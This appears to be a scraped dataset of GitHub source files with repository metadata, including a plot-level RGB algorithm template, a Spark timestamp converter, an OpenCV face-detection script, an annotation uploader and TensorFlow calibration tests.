2021-09-13T20:11:54.000Z
|
.github/workflows/algorithm_rgb.py
|
AgPipeline/plot-base-rgb
|
012cf97e45a0f281d21b94e02ff05fd34b459805
|
[
"BSD-3-Clause"
] | 3
|
2019-11-22T20:12:57.000Z
|
2021-05-07T13:52:12.000Z
|
"""My nifty plot-level RGB algorithm
"""
# Importing modules. Please add any additional import statements below
import numpy as np
# Definitions
# Please replace these definitions' values with the correct ones
VERSION = '1.0'
# Information on the creator of this algorithm
ALGORITHM_AUTHOR = 'Unknown'
ALGORITHM_AUTHOR_EMAIL = ''
ALGORITHM_CONTRIBUTORS = [""]
ALGORITHM_NAME = 'my nifty one'
ALGORITHM_DESCRIPTION = 'This algorithm calculates the niftyness of RGB plot-level images'
# Citation information for publication (more information in HOW_TO.md)
CITATION_AUTHOR = 'unknown'
CITATION_TITLE = ''
CITATION_YEAR = ''
# The name of one or more variables returned by the algorithm, separated by commas (more information in HOW_TO.md)
# If only one name is specified, no commas are used.
# Note that variable names cannot have commas in them: use a different separator instead. Also,
# all white space is kept intact; don't add any extra whitespace since it may cause name comparisons
# to fail.
# !! Replace the content of this string with your variable names
VARIABLE_NAMES = 'size of image channels'
# Variable units matching the order of VARIABLE_NAMES, also comma-separated.
# For each variable name in VARIABLE_NAMES add the unit of measurement the value represents.
# !! Replace the content of this string with your variables' unit
VARIABLE_UNITS = 'pixels'
# Variable labels matching the order of VARIABLE_NAMES, also comma-separated.
# This is an optional definition and can be left empty.
VARIABLE_LABELS = ''
# Optional override for the generation of a BETYdb compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_BETYDB_CSV = True
# Optional override for the generation of a TERRA REF Geostreams compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_GEOSTREAMS_CSV = True
# Entry point for plot-level RGB algorithm
def calculate(pxarray: np.ndarray):
"""Calculates one or more values from plot-level RGB data
Arguments:
pxarray: Array of RGB data for a single plot
Return:
Returns one or more calculated values
"""
# ALGORITHM: replace the following lines with your algorithm
channel_size = pxarray[:, :, 1].size
# RETURN: replace the following return with your calculated values. Be sure to order them as defined in VARIABLE_NAMES above
return channel_size
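# Hedged usage sketch (added for illustration; the surrounding framework is
# expected to call calculate() itself).  The dummy array shape is an assumption.
#
#   dummy_plot = np.zeros((10, 10, 3), dtype=np.uint8)
#   print(calculate(dummy_plot))  # channel 1 has 10 * 10 = 100 pixels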
| 38.095238
| 128
| 0.768333
|
import numpy as np
VERSION = '1.0'
# Information on the creator of this algorithm
ALGORITHM_AUTHOR = 'Unknown'
ALGORITHM_AUTHOR_EMAIL = ''
ALGORITHM_CONTRIBUTORS = [""]
ALGORITHM_NAME = 'my nifty one'
ALGORITHM_DESCRIPTION = 'This algorithm calculates the niftyness of RGB plot-level images'
# Citation information for publication (more information in HOW_TO.md)
CITATION_AUTHOR = 'unknown'
CITATION_TITLE = ''
CITATION_YEAR = ''
# The name of one or more variables returned by the algorithm, separated by commas (more information in HOW_TO.md)
# If only one name is specified, no commas are used.
# all white space is kept intact; don't add any extra whitespace since it may cause name comparisons
VARIABLE_NAMES = 'size of image channels'
VARIABLE_UNITS = 'pixels'
# Variable labels matching the order of VARIABLE_NAMES, also comma-separated.
# This is an optional definition and can be left empty.
VARIABLE_LABELS = ''
# Optional override for the generation of a BETYdb compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_BETYDB_CSV = True
# Optional override for the generation of a TERRA REF Geostreams compatible csv file
# Set to False to suppress the creation of a compatible file
WRITE_GEOSTREAMS_CSV = True
# Entry point for plot-level RGB algorithm
def calculate(pxarray: np.ndarray):
# ALGORITHM: replace the following lines with your algorithm
channel_size = pxarray[:, :, 1].size
# RETURN: replace the following return with your calculated values. Be sure to order them as defined in VARIABLE_NAMES above
return channel_size
| true
| true
|
790b14439046bd301a529a673057b56fe6681eb9
| 315
|
py
|
Python
|
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
sprint/core/parser/args.py
|
ii-Python/Sprint-v2
|
2579b7f9a36ac5c5ec541ca3dce6cf61357db948
|
[
"MIT"
] | null | null | null |
class Argument(object):
def __init__(self, argument = None, base: bool = False):
self.arg = argument
self.is_base = base
def __repr__(self):
return self.arg
def __str__(self):
return self.arg
def is_pipe(self):
return self.arg == ">>" or self.arg == "<<"
| 21
| 60
| 0.571429
|
class Argument(object):
def __init__(self, argument = None, base: bool = False):
self.arg = argument
self.is_base = base
def __repr__(self):
return self.arg
def __str__(self):
return self.arg
def is_pipe(self):
return self.arg == ">>" or self.arg == "<<"
| true
| true
|
790b153c215eea49b75468a9c1aed9959780cb22
| 1,662
|
py
|
Python
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 2
|
2021-12-27T10:41:59.000Z
|
2022-02-24T00:19:40.000Z
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 5
|
2020-10-22T01:19:11.000Z
|
2021-03-18T16:04:23.000Z
|
spark_auto_mapper/data_types/unix_timestamp.py
|
icanbwell/SparkAutoMapper
|
bfd5da72f3b55ec48860935228c1ecf6d7c1a2e4
|
[
"Apache-2.0"
] | 3
|
2020-12-17T21:23:46.000Z
|
2021-07-29T18:08:31.000Z
|
from typing import Optional
from pyspark.sql import Column, DataFrame
from pyspark.sql.functions import from_unixtime, to_timestamp
from spark_auto_mapper.data_types.data_type_base import AutoMapperDataTypeBase
from spark_auto_mapper.helpers.value_parser import AutoMapperValueParser
from spark_auto_mapper.type_definitions.defined_types import AutoMapperNumberInputType
class AutoMapperUnixTimestampType(AutoMapperDataTypeBase):
def __init__(self, value: AutoMapperNumberInputType) -> None:
"""
Converts the value to a timestamp type in Spark
:param value: value
:param formats: (Optional) formats to use for trying to parse the value otherwise uses Spark defaults
"""
super().__init__()
self.value: AutoMapperDataTypeBase = (
value
if isinstance(value, AutoMapperDataTypeBase)
else AutoMapperValueParser.parse_value(value)
)
def get_column_spec(
self, source_df: Optional[DataFrame], current_column: Optional[Column]
) -> Column:
# Convert from unix timestamp
column_spec: Column = to_timestamp(
from_unixtime(
self.value.get_column_spec(
source_df=source_df, current_column=current_column
),
format="yyyy-MM-dd HH:mm:ss",
),
format="yyyy-MM-dd HH:mm:ss",
)
if source_df is not None:
return column_spec
else:
column_spec = self.value.get_column_spec(
source_df=source_df, current_column=current_column
)
return column_spec
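# Hedged usage sketch (illustration only): the constructor also accepts a plain
# number, which is routed through AutoMapperValueParser.parse_value above.
#
#   ts_type = AutoMapperUnixTimestampType(1609459200)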
| 33.918367
| 109
| 0.661252
|
from typing import Optional
from pyspark.sql import Column, DataFrame
from pyspark.sql.functions import from_unixtime, to_timestamp
from spark_auto_mapper.data_types.data_type_base import AutoMapperDataTypeBase
from spark_auto_mapper.helpers.value_parser import AutoMapperValueParser
from spark_auto_mapper.type_definitions.defined_types import AutoMapperNumberInputType
class AutoMapperUnixTimestampType(AutoMapperDataTypeBase):
def __init__(self, value: AutoMapperNumberInputType) -> None:
super().__init__()
self.value: AutoMapperDataTypeBase = (
value
if isinstance(value, AutoMapperDataTypeBase)
else AutoMapperValueParser.parse_value(value)
)
def get_column_spec(
self, source_df: Optional[DataFrame], current_column: Optional[Column]
) -> Column:
column_spec: Column = to_timestamp(
from_unixtime(
self.value.get_column_spec(
source_df=source_df, current_column=current_column
),
format="yyyy-MM-dd HH:mm:ss",
),
format="yyyy-MM-dd HH:mm:ss",
)
if source_df is not None:
return column_spec
else:
column_spec = self.value.get_column_spec(
source_df=source_df, current_column=current_column
)
return column_spec
| true
| true
|
790b1607e2dbab856491d37aa237082f14588b83
| 2,040
|
py
|
Python
|
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
face_detection_cv2.py
|
HDWilliams/User_Verification_HPE
|
753cd5b3a757e228baba56a48fd50a56aea0b485
|
[
"MIT"
] | null | null | null |
import cv2
import pose_detection as pose_d
pose_model = pose_d.load_pose_model(r'pre_trained\AFLW2000.pkl')
def detect_face(img_PATH, model_PATH):
# Load the cascade
face_cascade = cv2.CascadeClassifier(model_PATH)
# Read the input image
img = cv2.imread(img_PATH)
# Convert into grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
if len(faces) > 1:
print('Multiple faces detected')
return False
elif len(faces) < 1:
print('No faces detected')
return False
# Draw rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
# Display the output
#cv2_imshow(img)
cv2.waitKey()
return True # TO DO may want to return face at some point as well
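# Hedged usage sketch (illustration only): both paths below are assumptions.
#
#   detect_face('test_images/face.jpg',
#               cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')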
def detect_face_video(pose_model):
# Load the cascade
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
# To capture video from webcam.
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
# To use a video file as input
# cap = cv2.VideoCapture('filename.mp4')
while True:
# Read the frame
_, img = cap.read()
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
# Get pose estimate
yaw, pitch, roll = pose_d.run_pose_detection(pose_model, pose_d.load_img(img))
# Draw the rectangle around each face
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
#draw pose label
img = pose_d.draw_labels(yaw, pitch, roll, img)
# Display
cv2.imshow('img', img)
# Stop if escape key is pressed
k = cv2.waitKey(30) & 0xff
if k==27:
break
# Release the VideoCapture object
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
detect_face_video(pose_model)
| 31.875
| 103
| 0.645588
|
import cv2
import pose_detection as pose_d
pose_model = pose_d.load_pose_model(r'pre_trained\AFLW2000.pkl')
def detect_face(img_PATH, model_PATH):
face_cascade = cv2.CascadeClassifier(model_PATH)
img = cv2.imread(img_PATH)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
if len(faces) > 1:
print('Multiple faces detected')
return False
elif len(faces) < 1:
print('No faces detected')
return False
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
cv2.waitKey()
return True
def detect_face_video(pose_model):
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
while True:
_, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.1, 4)
yaw, pitch, roll = pose_d.run_pose_detection(pose_model, pose_d.load_img(img))
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
img = pose_d.draw_labels(yaw, pitch, roll, img)
cv2.imshow('img', img)
k = cv2.waitKey(30) & 0xff
if k==27:
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
detect_face_video(pose_model)
| true
| true
|
790b1681efe2d5bb5b44069894dfe0b461c9f34f
| 753
|
py
|
Python
|
database/task_class/annotation.py
|
cozy9/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | 2
|
2021-08-01T19:33:44.000Z
|
2022-02-14T16:37:34.000Z
|
database/task_class/annotation.py
|
data2code/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | null | null | null |
database/task_class/annotation.py
|
data2code/Metascape
|
261901657bef5e1060f1ae86a2a3913d1e4c87c4
|
[
"Apache-2.0"
] | 1
|
2019-05-22T12:44:34.000Z
|
2019-05-22T12:44:34.000Z
|
#!/usr/bin/env python
#from .core import *
import numpy as np
import pandas as pd
import shutil
import urllib
import urlparse
from os.path import splitext, basename
import os
from os import sys, path
from pprint import pprint
import StringIO
import db
from gp import *
from core import *
from IPython.core.debugger import Tracer
class Annotation(UploadCsvConvert):
def __init__(self, xe):
xe.attrib['newCols'] = 'gid,annotation_type_id,content,annotation_field1,ds,tax_id'
UploadCsvConvert.__init__(self,xe=xe,dest='annotation')
self.type_col = 'annotation_type_id'
def get_type_col_value_sql(self):
return 'SELECT annotation_type_id FROM %s.annotation_type WHERE annotation_type_name = ?' % SyncDB.DATABASE
| 25.965517
| 115
| 0.759628
|
import numpy as np
import pandas as pd
import shutil
import urllib
import urlparse
from os.path import splitext, basename
import os
from os import sys, path
from pprint import pprint
import StringIO
import db
from gp import *
from core import *
from IPython.core.debugger import Tracer
class Annotation(UploadCsvConvert):
def __init__(self, xe):
xe.attrib['newCols'] = 'gid,annotation_type_id,content,annotation_field1,ds,tax_id'
UploadCsvConvert.__init__(self,xe=xe,dest='annotation')
self.type_col = 'annotation_type_id'
def get_type_col_value_sql(self):
return 'SELECT annotation_type_id FROM %s.annotation_type WHERE annotation_type_name = ?' % SyncDB.DATABASE
| true
| true
|
790b171ce026ef2d18e83d1683d9e31e7e375328
| 10,338
|
py
|
Python
|
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/builders/calibration_builder_test.py
|
zhaowt96/models
|
03182253673b0e2666ad9a33839759834c0acebd
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for calibration_builder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import interpolate
from six.moves import zip
import tensorflow as tf
from object_detection.builders import calibration_builder
from object_detection.protos import calibration_pb2
from object_detection.utils import test_case
class CalibrationBuilderTest(test_case.TestCase):
def test_tf_linear_interp1d_map(self):
"""Tests TF linear interpolation mapping to a single number."""
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.5, 0.5, 0.5])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_map_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_map_outputs
tf_map_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_map_outputs_np, [0.5, 0.5, 0.5, 0.5, 0.5])
def test_tf_linear_interp1d_interpolate(self):
"""Tests TF 1d linear interpolation not mapping to a single number."""
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.6, 0.7, 1.0])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_interpolate_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_interpolate_outputs
tf_interpolate_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_interpolate_outputs_np, [0.6, 0.65, 0.7, 0.85, 1.])
@staticmethod
def _get_scipy_interp1d(new_x, x, y):
"""Helper performing 1d linear interpolation using SciPy."""
interpolation1d_fn = interpolate.interp1d(x, y)
return interpolation1d_fn(new_x)
def _get_tf_interp1d(self, new_x, x, y):
"""Helper performing 1d linear interpolation using Tensorflow."""
def graph_fn():
tf_interp_outputs = calibration_builder._tf_linear_interp1d(
tf.convert_to_tensor(new_x, dtype=tf.float32),
tf.convert_to_tensor(x, dtype=tf.float32),
tf.convert_to_tensor(y, dtype=tf.float32))
return tf_interp_outputs
np_tf_interp_outputs = self.execute(graph_fn, [])
return np_tf_interp_outputs
def test_tf_linear_interp1d_against_scipy_map(self):
"""Tests parity of TF linear interpolation with SciPy for simple mapping."""
length = 10
np_x = np.linspace(0, 1, length)
# Mapping all numbers to 0.5
np_y_map = np.repeat(0.5, length)
# Scipy and TF interpolations
test_data_np = np.linspace(0, 1, length * 10)
scipy_map_outputs = self._get_scipy_interp1d(test_data_np, np_x, np_y_map)
np_tf_map_outputs = self._get_tf_interp1d(test_data_np, np_x, np_y_map)
self.assertAllClose(scipy_map_outputs, np_tf_map_outputs)
def test_tf_linear_interp1d_against_scipy_interpolate(self):
"""Tests parity of TF linear interpolation with SciPy."""
length = 10
np_x = np.linspace(0, 1, length)
# Requires interpolation over 0.5 to 1 domain
np_y_interp = np.linspace(0.5, 1, length)
# Scipy interpolation for comparison
test_data_np = np.linspace(0, 1, length * 10)
scipy_interp_outputs = self._get_scipy_interp1d(test_data_np, np_x,
np_y_interp)
np_tf_interp_outputs = self._get_tf_interp1d(test_data_np, np_x,
np_y_interp)
self.assertAllClose(scipy_interp_outputs, np_tf_interp_outputs)
@staticmethod
def _add_function_approximation_to_calibration_proto(calibration_proto,
x_array, y_array,
class_id):
"""Adds a function approximation to calibration proto for a class id."""
# Per-class calibration.
if class_id is not None:
function_approximation = (
calibration_proto.class_id_function_approximations
.class_id_xy_pairs_map[class_id])
# Class-agnostic calibration.
else:
function_approximation = (
calibration_proto.function_approximation.x_y_pairs)
for x, y in zip(x_array, y_array):
x_y_pair_message = function_approximation.x_y_pair.add()
x_y_pair_message.x = x
x_y_pair_message.y = y
def test_class_agnostic_function_approximation(self):
"""Tests that calibration produces correct class-agnostic values."""
# Generate fake calibration proto. For this interpolation, any input on
# [0.0, 0.5] should be divided by 2 and any input on (0.5, 1.0] should have
# 0.25 subtracted from it.
class_agnostic_x = np.asarray([0.0, 0.5, 1.0])
class_agnostic_y = np.asarray([0.0, 0.25, 0.75])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_agnostic_x, class_agnostic_y, class_id=None)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3],
[0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8],
[0.9, 1.0, 1.0]]], dtype=tf.float32)
# Everything should map to 0.5 if classes are ignored.
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.05, 0.1, 0.15],
[0.2, 0.25, 0.0]],
[[0.35, 0.45, 0.55],
[0.65, 0.75, 0.75]]])
def test_multiclass_function_approximations(self):
"""Tests that calibration produces correct multiclass values."""
# Background class (0-index) maps all predictions to 0.5.
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
# Class id 1 will interpolate using these values.
class_1_x = np.asarray([0.0, 0.2, 1.0])
class_1_y = np.asarray([0.0, 0.6, 1.0])
self._add_function_approximation_to_calibration_proto(
calibration_config, class_1_x, class_1_y, class_id=1)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.6], [0.5, 0.3]],
[[0.5, 0.7], [0.5, 0.96]]])
def test_temperature_scaling(self):
"""Tests that calibration produces correct temperature scaling values."""
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 2.0
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8], [0.9, 1.0, 1.0]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np,
[[[0.05, 0.1, 0.15], [0.2, 0.25, 0.0]],
[[0.3, 0.35, 0.4], [0.45, 0.5, 0.5]]])
def test_temperature_scaling_incorrect_value_error(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 0
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3]]], dtype=tf.float32)
with self.assertRaises(ValueError):
calibration_fn(class_predictions_with_background)
def test_skips_class_when_calibration_parameters_not_present(self):
"""Tests that graph fails when parameters not present for all classes."""
# Only adding calibration parameters for class id = 0, even though class id
# 1 is present in the data.
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.2], [0.5, 0.1]],
[[0.5, 0.4], [0.5, 0.92]]])
if __name__ == '__main__':
tf.test.main()
| 44.179487
| 80
| 0.667054
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import interpolate
from six.moves import zip
import tensorflow as tf
from object_detection.builders import calibration_builder
from object_detection.protos import calibration_pb2
from object_detection.utils import test_case
class CalibrationBuilderTest(test_case.TestCase):
def test_tf_linear_interp1d_map(self):
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.5, 0.5, 0.5])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_map_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_map_outputs
tf_map_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_map_outputs_np, [0.5, 0.5, 0.5, 0.5, 0.5])
def test_tf_linear_interp1d_interpolate(self):
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.6, 0.7, 1.0])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_interpolate_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_interpolate_outputs
tf_interpolate_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_interpolate_outputs_np, [0.6, 0.65, 0.7, 0.85, 1.])
@staticmethod
def _get_scipy_interp1d(new_x, x, y):
interpolation1d_fn = interpolate.interp1d(x, y)
return interpolation1d_fn(new_x)
def _get_tf_interp1d(self, new_x, x, y):
def graph_fn():
tf_interp_outputs = calibration_builder._tf_linear_interp1d(
tf.convert_to_tensor(new_x, dtype=tf.float32),
tf.convert_to_tensor(x, dtype=tf.float32),
tf.convert_to_tensor(y, dtype=tf.float32))
return tf_interp_outputs
np_tf_interp_outputs = self.execute(graph_fn, [])
return np_tf_interp_outputs
def test_tf_linear_interp1d_against_scipy_map(self):
length = 10
np_x = np.linspace(0, 1, length)
np_y_map = np.repeat(0.5, length)
test_data_np = np.linspace(0, 1, length * 10)
scipy_map_outputs = self._get_scipy_interp1d(test_data_np, np_x, np_y_map)
np_tf_map_outputs = self._get_tf_interp1d(test_data_np, np_x, np_y_map)
self.assertAllClose(scipy_map_outputs, np_tf_map_outputs)
def test_tf_linear_interp1d_against_scipy_interpolate(self):
length = 10
np_x = np.linspace(0, 1, length)
np_y_interp = np.linspace(0.5, 1, length)
test_data_np = np.linspace(0, 1, length * 10)
scipy_interp_outputs = self._get_scipy_interp1d(test_data_np, np_x,
np_y_interp)
np_tf_interp_outputs = self._get_tf_interp1d(test_data_np, np_x,
np_y_interp)
self.assertAllClose(scipy_interp_outputs, np_tf_interp_outputs)
@staticmethod
def _add_function_approximation_to_calibration_proto(calibration_proto,
x_array, y_array,
class_id):
if class_id is not None:
function_approximation = (
calibration_proto.class_id_function_approximations
.class_id_xy_pairs_map[class_id])
else:
function_approximation = (
calibration_proto.function_approximation.x_y_pairs)
for x, y in zip(x_array, y_array):
x_y_pair_message = function_approximation.x_y_pair.add()
x_y_pair_message.x = x
x_y_pair_message.y = y
def test_class_agnostic_function_approximation(self):
class_agnostic_x = np.asarray([0.0, 0.5, 1.0])
class_agnostic_y = np.asarray([0.0, 0.25, 0.75])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_agnostic_x, class_agnostic_y, class_id=None)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3],
[0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8],
[0.9, 1.0, 1.0]]], dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.05, 0.1, 0.15],
[0.2, 0.25, 0.0]],
[[0.35, 0.45, 0.55],
[0.65, 0.75, 0.75]]])
def test_multiclass_function_approximations(self):
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
class_1_x = np.asarray([0.0, 0.2, 1.0])
class_1_y = np.asarray([0.0, 0.6, 1.0])
self._add_function_approximation_to_calibration_proto(
calibration_config, class_1_x, class_1_y, class_id=1)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.6], [0.5, 0.3]],
[[0.5, 0.7], [0.5, 0.96]]])
def test_temperature_scaling(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 2.0
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8], [0.9, 1.0, 1.0]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np,
[[[0.05, 0.1, 0.15], [0.2, 0.25, 0.0]],
[[0.3, 0.35, 0.4], [0.45, 0.5, 0.5]]])
def test_temperature_scaling_incorrect_value_error(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 0
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3]]], dtype=tf.float32)
with self.assertRaises(ValueError):
calibration_fn(class_predictions_with_background)
def test_skips_class_when_calibration_parameters_not_present(self):
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.2], [0.5, 0.1]],
[[0.5, 0.4], [0.5, 0.92]]])
if __name__ == '__main__':
tf.test.main()
| true
| true
|
790b173432bf26c0008a0f7d958ea9da6255f9ea
| 814
|
py
|
Python
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 63
|
2018-05-17T21:02:14.000Z
|
2021-11-15T19:18:03.000Z
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 225
|
